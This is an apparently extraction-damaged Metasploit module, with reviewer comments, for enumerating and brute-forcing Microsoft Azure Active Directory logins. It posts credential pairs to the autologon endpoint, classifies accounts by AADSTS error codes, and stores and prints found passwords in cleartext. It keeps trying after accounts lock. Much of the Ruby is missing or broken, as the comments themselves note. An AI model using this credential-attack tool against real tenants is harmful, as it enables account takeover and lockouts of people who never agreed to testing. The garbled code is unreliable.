# This module requires Metasploit:
# Current source:

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute

  # Declares the module's metadata, default option values and datastore
  # options, then removes a set of inherited options.
  #
  # Visible defaults: RPORT 443, SSL enabled, an empty RHOST and a PASSWORD of
  # 'password'. RHOST, DOMAIN and TARGETURI are declared as required options;
  # TARGETURI defaults to '/winauth/trust/2005/usernamemixed'.
  #
  # The final deregister_options call removes PASSWORD_SPRAY, VHOST,
  # USER_AS_PASS, USERPASS_FILE, STOP_ON_SUCCESS, Proxies, the DB_ALL_* options,
  # BLANK_PASSWORDS and RHOSTS from the module.
  #
  # NOTE(review): this listing appears to have lost lines during extraction.
  # The call that wraps the metadata hash, the reference URLs, the option
  # constructor names, several closing brackets/braces and the method's `end`
  # are not visible, so the method is not valid Ruby as shown. Restore it from
  # the upstream module rather than from this page.
  def initialize
      'Name' => 'Microsoft Azure Active Directory Login Enumeration',
      'Description' => %q{
        This module enumerates valid usernames and passwords against a
        Microsoft Azure Active Directory domain by utilizing a flaw in
        how SSO authenticates.
      'Author' => [
        'Matthew Dunn - k0pak4'
      'License' => MSF_LICENSE,
      'References' => [
        [ 'URL', ''],
        [ 'URL', ''],
        [ 'URL', ''],
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true,
        'RHOST' => '',
        'PASSWORD' => 'password'

      ['RHOST', [true, 'The target Azure endpoint', '']),'DOMAIN', [true, 'The target Azure AD domain']),'TARGETURI', [ true, 'The base path to the Azure autologon endpoint', '/winauth/trust/2005/usernamemixed']),

    deregister_options('PASSWORD_SPRAY', 'VHOST', 'USER_AS_PASS',
                       'USERPASS_FILE', 'STOP_ON_SUCCESS', 'Proxies',
                       'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS',
                       'BLANK_PASSWORDS', 'RHOSTS')

  # Builds the service, credential and login records for one finding against
  # the Azure AD service.
  #
  # @param address [String] host address attached to the service record
  # @param domain [String] stored as the Active Directory domain realm value
  # @param username [String] account name to record
  # @param password [String, nil] stored as the credential's private data with
  #   private_type :password; check_login passes nil when only the account
  #   name was confirmed
  #
  # NOTE(review): the closing braces, the code that consumes login_data and
  # the method's `end` are not visible in this listing (apparently lost in
  # extraction), so what is finally persisted cannot be confirmed from here.
  # NOTE(review): the login status is the SUCCESSFUL constant for every call,
  # including calls made for a valid account with a wrong or absent password.
  # Confirm that this is intended before trusting stored login status.
  def report_login(address, domain, username, password)
    # Service record: the shared service details plus this host's address,
    # a fixed service name and the current workspace.
    service_data = service_details.merge({
      address: address,
      service_name: 'Azure AD',
      workspace_id: myworkspace_id
    # Credential record. The password is kept as cleartext private data, so
    # the workspace that receives it should be handled as sensitive material.
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
      realm_value: domain,
      username: username,
      private_data: password,
      private_type: :password
    # Login record tying the created credential to a status.
    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL


  # Submits one username/password pair to the autologon endpoint in a SOAP
  # envelope carrying a wsse:UsernameToken, then classifies the XML reply.
  #
  # A reply containing a DesktopSsoToken element is treated as a valid login.
  # Otherwise the text under //internalerror/text is matched against AADSTS
  # error-code prefixes. The service answers with different codes for existing
  # and non-existing accounts, and that difference is what the classification
  # relies on.
  #
  # @param targeturi [String] path appended after the domain in the request URI
  # @param domain [String] Azure AD domain; used in the URI and appended to the
  #   username as "user@domain"
  # @param username [String] account name; stripped and XML-escaped before use
  # @param password [String] candidate password; stripped and XML-escaped
  #
  # Aborts the module through fail_with(Failure::Unreachable, ...) when no
  # response is received.
  #
  # NOTE(review): this listing is truncated. The timestamp expressions, most of
  # the envelope (including the closing quote of the body string), closing
  # braces and every `end` are missing, so the method is not valid Ruby as
  # shown.
  # NOTE(review): domain and url are interpolated into the XML without the
  # escaping applied to username and password. They are operator-supplied
  # options, but confirm that is acceptable.
  # NOTE(review): candidate passwords are printed in cleartext by print_good,
  # so console output and any saved logs become sensitive.
  # NOTE(review): on AADSTS50053 (account locked) the visible code only prints
  # a message. No pause or stop is visible, so repeated attempts can keep
  # accounts locked. Whether these attempts show up in tenant sign-in logs
  # cannot be told from this code, so confirm logging and lockout coverage
  # for this endpoint.
  def check_login(targeturi, domain, username, password)
    # Fresh identifier sent as the client-request-id query parameter.
    request_id = SecureRandom.uuid
    url = "https://#{rhost}/#{domain}#{targeturi}"

    # NOTE(review): the right-hand sides look stripped by extraction. The
    # expiry is presumably the creation time plus 600 seconds -- confirm.
    created =
    expires = ( + 600).inspect

    message_id = SecureRandom.uuid
    username_token = SecureRandom.uuid

    body = "<?xml version='1.0' encoding='UTF-8'?>
<s:Envelope xmlns:s='' xmlns:wsse='' xmlns:saml='urn:oasis:names:tc:SAML:1.0:assertion' xmlns:wsp='' xmlns:wsu='' xmlns:wsa='' xmlns:wssc='' xmlns:wst='' xmlns:ic=''>
        <wsa:Action s:mustUnderstand='1'></wsa:Action>
        <wsa:To s:mustUnderstand='1'>#{url}</wsa:To>
        <wsse:Security s:mustUnderstand=\"1\">
            <wsu:Timestamp wsu:Id=\"_0\">
            <wsse:UsernameToken wsu:Id=\"#{username_token}\">
                <wsse:Username>#{username.strip.encode(xml: :text)}@#{domain}</wsse:Username>
                <wsse:Password>#{password.strip.encode(xml: :text)}</wsse:Password>
        <wst:RequestSecurityToken Id='RST0'>

    res = send_request_raw({
      'uri' => "/#{domain}#{targeturi}",
      'method' => 'POST',
      'vars_get' => {
        'client-request-id' => request_id
      'data' => body

    # No response at all: stop the whole run instead of misclassifying.
    unless res
      fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")

    # Record the host once and reuse the result on later calls.
    @target_host ||= report_host(host: rhost, name: rhost, state: Msf::HostState::Alive)

    # Parse the XML response, then read either the SSO token or the error text
    xml = res.get_xml_document

    # NOTE(review): an `else` between the two assignments below appears to be
    # missing from this listing. As shown, the second assignment would always
    # run and would fail on nil when the reply has no //internalerror/text
    # node.
    if xml.xpath('//DesktopSsoToken')[0]
      auth_details = xml.xpath('//DesktopSsoToken')[0].text
      auth_details = xml.xpath('//internalerror/text')[0].text

    # Classification: the token branch and AADSTS50076 record the password,
    # the other "valid user" branches record the username with a nil password,
    # and the remaining branches only print.
    if xml.xpath('//DesktopSsoToken')[0]
      print_good("Login #{domain}\\#{username}:#{password} is valid!")
      print_good("Desktop SSO Token: #{auth_details}")
      report_login(@target_host.address, domain, username, password)
    elsif auth_details.start_with?('AADSTS50126') # Valid user but incorrect password
      print_good("Password #{password} is invalid but #{domain}\\#{username} is valid!")
      report_login(@target_host.address, domain, username, nil)
    elsif auth_details.start_with?('AADSTS50056') # User exists without a password in Azure AD
      print_good("#{domain}\\#{username} is valid but the user does not have a password in Azure AD!")
      report_login(@target_host.address, domain, username, nil)
    elsif auth_details.start_with?('AADSTS50076') # User exists, but you need MFA to connect to this resource
      print_good("Login #{domain}\\#{username}:#{password} is valid, but you need MFA to connect to this resource")
      report_login(@target_host.address, domain, username, password)
    elsif auth_details.start_with?('AADSTS50014') # User exists, but the maximum Pass-through Authentication time was exceeded
      print_good("#{domain}\\#{username} is valid but the maximum pass-through authentication time was exceeded")
      report_login(@target_host.address, domain, username, nil)
    elsif auth_details.start_with?('AADSTS50034') # User does not exist
      print_error("#{domain}\\#{username} is not a valid user")
    elsif auth_details.start_with?('AADSTS50053') # Account is locked
      print_error('Account is locked, consider taking time before continuuing to scan!')
    else # Unknown error code
      print_error("Received unknown response with error code: #{auth_details}")

  # Module entry point: passes every username/password pair yielded by
  # each_user_pass to check_login, using the TARGETURI and DOMAIN datastore
  # options.
  #
  # NOTE(review): each_user_pass is presumably provided by the included
  # AuthBrute mixin -- confirm. The closing `end` lines are not visible in
  # this listing.
  def run
    each_user_pass do |cur_user, cur_pass|
      check_login(datastore['TARGETURI'], datastore['DOMAIN'], cur_user, cur_pass)